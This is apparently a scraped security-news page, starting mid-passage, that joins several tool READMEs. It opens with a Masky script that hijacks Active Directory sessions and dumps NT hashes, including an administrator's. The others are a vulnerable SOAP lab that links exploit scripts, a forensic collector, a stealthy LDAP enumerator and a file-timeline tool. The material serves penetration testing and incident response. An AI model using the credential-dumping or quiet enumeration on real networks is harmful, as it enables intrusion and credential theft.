ca = "srv-01.sec.lab\sec-SRV-01-CA"
dc_ip = "192.168.23.148"
domain = "sec.lab"
user = "askywalker"
password = getpass()

# Create a Masky instance with these credentials
m = Masky(ca=ca, user=user, dc_ip=dc_ip, domain=domain, password=password)

# Set a target and run Masky against it
target = "192.168.23.130"
rslts = m.run(target)

# Check if Masky succesfully hijacked at least a user session
# or if an unexpected error occured
if not rslts:
return False

# Loop on MaskyResult object to display hijacked users and to retreive their NT hashes
print(f"Results from hostname: {rslts.hostname}")
for user in rslts.users:
print(f"\t - {user.domain}\{user.n ame} - {user.nt_hash}")

return True


if __name__ == "__main__":
dump_nt_hashes()

Its execution generate the following output.

$> python3 .\masky_demo.py
Password:
Results from hostname: SRV-01
- sec\hsolo - 05ff4b2d523bc5c21e195e9851e2b157
- sec\askywalker - 8928e0723012a8471c0084149c4e23b1
- sec\administrator - 4f1c6b554bb79e2ce91e012ffbe6988a

A MaskyResults object containing a list of User objects is returned after a successful execution of Masky.

Please look at the masky\lib\results.py module to check the methods and attributes provided by these two classes.

Acknowledgments



Erlik - Vulnerable Soap Service


Erlik - Vulnerable Soap Service

Tested - Kali 2022.1

Description

It is a vulnerable SOAP web service. It is a lab environment created for people who want to improve themselves in the field of web penetration testing.


Features

It contains the following vulnerabilities.

  • LFI
  • SQL Injection
  • Informaion Disclosure
  • Command Inejction
  • Brute Force
  • Deserialization

Installation

git clone https://github.com/anil-yelken/Vulnerable-Soap-Service

cd Vulnerable-Soap-Service

sudo pip3 install requirements.txt

Usage

sudo python3 vulnerable_soap.py

Exploiting Vulnerabilities

LFI

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/lfi.py

SQL Injection

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/sqli.py

Informaion Disclosure

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/get_logs_information_disclosure.py

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/get_data_information_disclosure.py

Command Injection

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/commandi.py

Brute Force

Code:https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/brute.py

Deserialization

Code:

https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/deserialization_socket.py

https://github.com/anil-yelken/Vulnerable-Soap-Service/blob/main/deserialization_requests.py



Pict - Post-Infection Collection Toolkit


This set of scripts is designed to collect a variety of data from an endpoint thought to be infected, to facilitate the incident response process. This data should not be considered to be a full forensic data collection, but does capture a lot of useful forensic information.

If you want true forensic data, you should really capture a full memory dump and image the entire drive. That is not within the scope of this toolkit.


How to use

The script must be run on a live system, not on an image or other forensic data store. It does not strictly require root permissions to run, but it will be unable to collect much of the intended data without.

Data will be collected in two forms. First is in the form of summary files, containing output of shell commands, data extracted from databases, and the like. For example, the browser module will output a browser_extensions.txt file with a summary of all the browser extensions installed for Safari, Chrome, and Firefox.

The second are complete files collected from the filesystem. These are stored in an artifacts subfolder inside the collection folder.

Syntax

The script is very simple to run. It takes only one parameter, which is required, to pass in a configuration script in JSON format:

./pict.py -c /path/to/config.json

The configuration script describes what the script will collect, and how. It should look something like this:

collection_dest

This specifies the path to store the collected data in. It can be an absolute path or a path relative to the user's home folder (by starting with a tilde). The default path, if not specified, is /Users/Shared.

Data will be collected in a folder created in this location. That folder will have a name in the form PICT-computername-YYYY-MM-DD, where the computer name is the name of the machine specified in System Preferences > Sharing and date is the date of collection.

all_users

If true, collects data from all users on the machine whenever possible. If false, collects data only for the user running the script. If not specified, this value defaults to true.

collectors

PICT is modular, and can easily be expanded or reduced in scope, simply by changing what Collector modules are used.

The collectors data is a dictionary where the key is the name of a module to load (the name of the Python file without the .py extension) and the value is the name of the Collector subclass found in that module. You can add additional entries for custom modules (see Writing your own modules), or can remove entries to prevent those modules from running. One easy way to remove modules, without having to look up the exact names later if you want to add them again, is to move them into a top-level dictionary named unused.

settings

This dictionary provides global settings.

keepLSData specifies whether the lsregister.txt file - which can be quite large - should be kept. (This file is generated automatically and is used to build output by some other modules. It contains a wealth of useful information, but can be well over 100 MB in size. If you don't need all that data, or don't want to deal with that much data, set this to false and it will be deleted when collection is finished.)

zipIt specifies whether to automatically generate a zip file with the contents of the collection folder. Note that the process of zipping and unzipping the data will change some attributes, such as file ownership.

moduleSettings

This dictionary specifies module-specific settings. Not all modules have their own settings, but if a module does allow for its own settings, you can provide them here. In the above example, you can see a boolean setting named collectArtifacts being used with the browser module.

There are also global module settings that are maintained by the Collector class, and that can be set individually for each module.

collectArtifacts specifies whether to collect the file artifacts that would normally be collected by the module. If false, all artifacts will be omitted for that module. This may be needed in cases where storage space is a consideration, and the collected artifacts are large, or in cases where the collected artifacts may represent a privacy issue for the user whose system is being analyzed.

Writing your own modules

Modules must consist of a file containing a class that is subclassed from Collector (defined in collectors/collector.py), and they must be placed in the collectors folder. A new Collector module can be easily created by duplicating the collectors/template.py file and customizing it for your own use.

def __init__(self, collectionPath, allUsers)

This method can be overridden if necessary, but the super Collector.init() must be called in such a case, preferably before your custom code executes. This gives the object the chance to get its properties set up before your code tries to use them.

def printStartInfo(self)

This is a very simple method that will be called when this module's collection begins. Its intent is to print a message to stdout to give the user a sense of progress, by providing feedback about what is happening.

def applySettings(self, settingsDict)

This gives the module the chance to apply any custom settings. Each module can have its own self-defined settings, but the settingsDict should also be passed to the super, so that the Collection class can handle any settings that it defines.

def collect(self)

This method is the core of the module. This is called when it is time for the module to begin collection. It can write as many files as it needs to, but should confine this activity to files within the path self.collectionPath, and should use filenames that are not already taken by other modules.

If you wish to collect artifacts, don't try to do this on your own. Simply add paths to the self.pathsToCollect array, and the Collector class will take care of copying those into the appropriate subpaths in the artifacts folder, and maintaining the metadata (permissions, extended attributes, flags, etc) on the artifacts.

When the method finishes, be sure to call the super (Collector.collect(self)) to give the Collector class the chance to handle its responsibilities, such as collecting artifacts.

Your collect method can use any data collected in the basic_info.txt or lsregister.txt files found at self.collectionPath. These are collected at the beginning by the pict.py script, and can be assumed to be available for use by any other modules. However, you should not rely on output from any other modules, as there is no guarantee that the files will be available when your module runs. Modules may not run in the order they appear in your configuration JSON, since Python dictionaries are unordered.

Credits

Thanks to Greg Neagle for FoundationPlist.py, which solved lots of problems with reading binary plists, plists containing date data types, etc.



SilentHound - Quietly Enumerate An Active Directory Domain Via LDAP Parsing Users, Admins, Groups, Etc.


Quietly enumerate an Active Directory Domain via LDAP parsing users, admins, groups, etc. Created by Nick Swink from Layer 8 Security.


Installation

Using pipenv (recommended method)

sudo python3 -m pip install --user pipenv
git clone https://github.com/layer8secure/SilentHound.git
cd silenthound
pipenv install

This will create an isolated virtual environment with dependencies needed for the project. To use the project you can either open a shell in the virtualenv with pipenv shell or run commands directly with pipenv run.

From requirements.txt (legacy)

This method is not recommended because python-ldap can cause many dependency errors.

Install dependencies with pip:

python3 -m pip install -r requirements.txt
python3 silenthound.py -h

Usage

$ pipenv run python silenthound.py -h
usage: silenthound.py [-h] [-u USERNAME] [-p PASSWORD] [-o OUTPUT] [-g] [-n] [-k] TARGET domain

Quietly enumerate an Active Directory environment.

positional arguments:
TARGET Domain Controller IP
domain Dot (.) separated Domain name including both contexts e.g. ACME.com / HOME.local / htb.net

optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
LDAP username - not the same as user principal name. E.g. Username: bob.dole might be 'bob
dole'
-p PASSWORD, --password PASSWORD
LDAP passwo rd - use single quotes 'password'
-o OUTPUT, --output OUTPUT
Name for output files. Creates output files for hosts, users, domain admins, and descriptions
in the current working directory.
-g, --groups Display Group names with user members.
-n, --org-unit Display Organizational Units.
-k, --keywords Search for key words in LDAP objects.

About

A lightweight tool to quickly and quietly enumerate an Active Directory environment. The goal of this tool is to get a Lay of the Land whilst making as little noise on the network as possible. The tool will make one LDAP query that is used for parsing, and create a cache file to prevent further queries/noise on the network. If no credentials are passed it will attempt anonymous BIND.

Using the -o flag will result in output files for each section normally in stdout. The files created using all flags will be:

-rw-r--r--  1 kali  kali   122 Jun 30 11:37 BASENAME-descriptions.txt
-rw-r--r-- 1 kali kali 60 Jun 30 11:37 BASENAME-domain_admins.txt
-rw-r--r-- 1 kali kali 2620 Jun 30 11:37 BASENAME-groups.txt
-rw-r--r-- 1 kali kali 89 Jun 30 11:37 BASENAME-hosts.txt
-rw-r--r-- 1 kali kali 1940 Jun 30 11:37 BASENAME-keywords.txt
-rw-r--r-- 1 kali kali 66 Jun 30 11:37 BASENAME-org.txt
-rw-r--r-- 1 kali kali 529 Jun 30 11:37 BASENAME-users.txt

Author

Roadmap

  • Parse users belonging to specific OUs
  • Refine output
  • Continuously cleanup code
  • Move towards OOP

For additional feature requests please submit an issue and add the enhancement tag.



modDetective - Tool That Chronologizes Files Based On Modification Time In Order To Investigate Recent System Activity


modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. This can be used in CTF's in order to pinpoint where escalation and attack vectors may exist.


modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. (1)

To see the tool in its most useful form, try running the command as follows: python3 modDetective.py -i /usr/share,/usr/lib,/lib. This will ignore the /usr/lib, /usr/share, and /lib directories, which tend not to have anything of interest. Also note that by default the "dynamic" directories are ignored (/proc, /sys, /run, /snap, /dev).

What is modDetective Doing?

modDetective is very elementary in how it operates. It simply walks the filesystem, with bounds determined by user specified options (-i is for ignore, meaning the tool will walk every directory EXCEPT for the ones specified in the -i option, and -e is for exclusive, meaning the tool will ONLY walk the directories specified). While walking, it picks up the modification times of each file, then orders these modification times in order to output them chronologically.

Additionally, in the output you will potentially see some files highlighted red. These files are denoted as "Indicators of User Activity," Since recent modifications to these files indicate that a user is currently active. As of now, these files include .swp files, .bash_history, .python_history and .viminfo. This list will be extended as I brainstorm more files that indicate present user activity.

Requirements

modDetective currently works only with python3; python2 compatability will be completed shortly (hence the lack of f strings). Standard libraries should be fine.



โŒ